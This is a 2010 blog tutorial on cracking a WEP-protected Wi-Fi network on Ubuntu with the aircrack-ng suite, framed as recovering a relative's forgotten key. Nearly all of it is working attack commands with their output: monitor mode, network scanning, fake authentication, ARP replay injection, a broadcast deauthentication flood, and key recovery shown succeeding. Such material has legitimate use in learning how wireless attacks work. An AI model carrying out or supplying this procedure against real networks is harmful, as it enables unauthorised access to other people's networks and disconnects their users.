Hacking WEP encryption on Ubuntu | Intracto

08 May 2010

Hacking WEP encryption on Ubuntu

The information below is not intended to harm other people. Cracking other peoples network is considered illegal in most countries!! Last day, my sister called me up because she couldn't connect to her wireless network any more. She was playing with her network connections and broke everything. She didn't know the key for her wireless access point and the access point couldn't be reset because it's on the attic and we couldn't reach it.

So I thought I give it a try to hack the access point. Here are the steps I followed: First I took a look if my laptop could see the wireless network. The network I want to crack is wifi9/7

hacking WEP

Let's start cracking the key with the installation of aircrack-ng

sudo apt-get install aircrack-ng

List the adapters

wim@wim-ubuntu:~$ sudo airmon-ng Interface Chipset Driver wlan0 Intel 3945ABG iwl3945 - [phy0]

I have only one wireless card in my laptop (wlan0) so this is obviously the card I have to use. Next, I have to put my wireless card in monitoring mode

wim@wim-ubuntu:~$ sudo airmon-ng start wlan0 Found 5 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! PID Name 899 NetworkManager 906 avahi-daemon 977 avahi-daemon 1113 wpa_supplicant 2744 dhclient Process with PID 2744 (dhclient) is running on interface wlan0 Interface Chipset Driver wlan0 Intel 3945ABG iwl3945 - [phy0] (monitor mode enabled on mon0)

mon0 is a new interface which I will use for monitoring. If I run the previous command again, mon0 should be listed as interface.

wim@wim-ubuntu:~$ sudo airmon-ng Interface Chipset Driver wlan0 Intel 3945ABG iwl3945 - [phy0] mon0 Intel 3945ABG iwl3945 - [phy0]

Next, launch airodump on the new interface to hop all the channels and show the wireless networks that can be found:

wim@wim-ubuntu:~$ sudo airodump-ng mon0 CH 2 ][ Elapsed: 24 s ][ 2010-02-08 19:43 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:21:91:F2:06:D9 -1 0 0 0 123 -1 00:1D:7E:43:52:33 -48 61 52 2 1 54e WPA2 CCMP PSK cisco 00:1B:11:6E:78:6D -79 72 0 0 9 54 WEP WEP wifi6-2 00:24:01:65:97:69 -79 54 0 0 6 54 WEP WEP wifi9/7 00:1D:19:23:BC:57 -84 19 14 0 9 54 . WPA2 CCMP PSK GCS 00:23:EE:CB:5A:61 -87 10 1 0 11 54e WPA TKIP PSK telenet-039FF 00:21:91:F3:7D:B6 -88 4 0 0 9 54 WEP WEP WIFI 18 BSSID STATION PWR Rate Lost Packets Probes 00:21:91:F2:06:D9 00:24:2B:8B:4F:81 -83 0 - 1 0 39 baranilew,bbox2-b0c7,default 00:1D:7E:43:52:33 00:1B:77:D9:A9:52 0 54e-54e 0 49 cisco

The network I like to hack (wifi9/7) is listed. I can see that it is secured by WEP. If the security is WPA, it's a lot harder to crack.

Next, run airodump-ng again, but now, let it look at the channel which is used by the network we will crack. In this case 6

wim@wim-ubuntu:~$ sudo airodump-ng --channel 6 mon0 CH 6 ][ Elapsed: 16 s ][ 2010-02-08 19:51 ][ fixed channel mon0: 1 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:21:91:F2:06:D9 -1 0 0 0 0 133 -1 00:1D:7E:43:52:33 -34 1 10 1 0 1 54e WPA2 CCMP PSK cisco 00:24:01:65:97:69 -75 96 117 0 0 6 54 WEP WEP wifi9/7 BSSID STATION PWR Rate Lost Packets Probes 00:21:91:F2:06:D9 00:24:2B:8B:4F:81 -85 0 - 5 0 7 default 00:1D:7E:43:52:33 00:1B:77:D9:A9:52 0 1e- 1 0 10 cisco

Just let the previous screen run and open a new consolewindow to run a fake attempt for authentication. The value after -a is the MAC-address from the network we want to crack, the -e value is the name of the network

wim@wim-ubuntu:~$ sudo aireplay-ng --fakeauth 0 -a 00:24:01:65:97:69 -e wifi9/7 mon0 No source MAC (-h) specified. Using the device MAC (00:1B:77:D9:A9:52) 19:56:24 Waiting for beacon frame (BSSID: 00:24:01:65:97:69) on channel 6 19:56:24 Sending Authentication Request (Open System) [ACK] 19:56:24 Authentication successful 19:56:24 Sending Association Request [ACK] 19:56:24 Association successful :-) (AID: 1)

The association is successfull. This means the target host doesn't use MAC filtering. This is good for me, so I don't have to spoof my MAC address. Now everything is ready to crack the key. first, if in your first console the airdump command is still running, close it and start it again with an option to save the output to a file:

wim@wim-ubuntu:~$ sudo airodump-ng --channel 6 -w /home/wim/crackwepwifi -i mon0 CH 6 ][ Elapsed: 0 s ][ 2010-02-08 20:01 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:24:01:65:97:69 -72 100 29 4 0 6 54 WEP WEP wifi9/7 BSSID STATION PWR Rate Lost Packets Probes

To actually crack the key, I need a lot of data. In this case, I've only got 4 packets where I need around 100000 so I have to speed things up a little bit by launching aireplay in injection mode in a new console window:

wim@wim-ubuntu:~$ sudo aireplay-ng -3 -b 00:24:01:65:97:69 mon0 No source MAC (-h) specified. Using the device MAC (00:1B:77:D9:A9:52) 20:07:31 Waiting for beacon frame (BSSID: 00:24:01:65:97:69) on channel 6 Saving ARP requests in replay_arp-0208-200731.cap You should also start airodump-ng to capture replies. Read 63 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)

Now keep the aireplay-ng and airodump-ng running and run the deauth attack.

wim@wim-ubuntu:~$ sudo aireplay-ng --deauth 0 -a 00:24:01:65:97:69 mon0 20:10:02 Waiting for beacon frame (BSSID: 00:24:01:65:97:69) on channel 6 NB: this attack is more effective when targeting a connected wireless client (-c ). 20:10:02 Sending DeAuth to broadcast -- BSSID: [00:24:01:65:97:69] 20:10:02 Sending DeAuth to broadcast -- BSSID: [00:24:01:65:97:69] 20:10:03 Sending DeAuth to broadcast -- BSSID: [00:24:01:65:97:69] 20:10:03 Sending DeAuth to broadcast -- BSSID: [00:24:01:65:97:69]

Let everything run. After a few minutes, you should receive ARP requests and the data will start increasing very fast. I've noticed that it goes a little bit faster when I tried to connect in Ubuntu with the target network. When there are enough packets captured, it's time to crack them. I've opened a new console and used following command where crackwepwifi-02.ivs is the file we entered previously:

wim@wim-ubuntu:~$ sudo aircrack-ng -0 -b 00:24:01:65:97:69 /home/wim/crackwepwifi-02.ivs Opening /home/wim/crackwepwifi-02.ivs Attack will be restarted every 5000 captured ivs. Starting PTW attack with 88000 ivs. KEY FOUND! [ 30:36:34:36:39 ] (ASCII: 06469 ) Decrypted correctly: 100%

Got it! The key for the network is 06469. I could connect to it without a problem and made my sister happy again :-)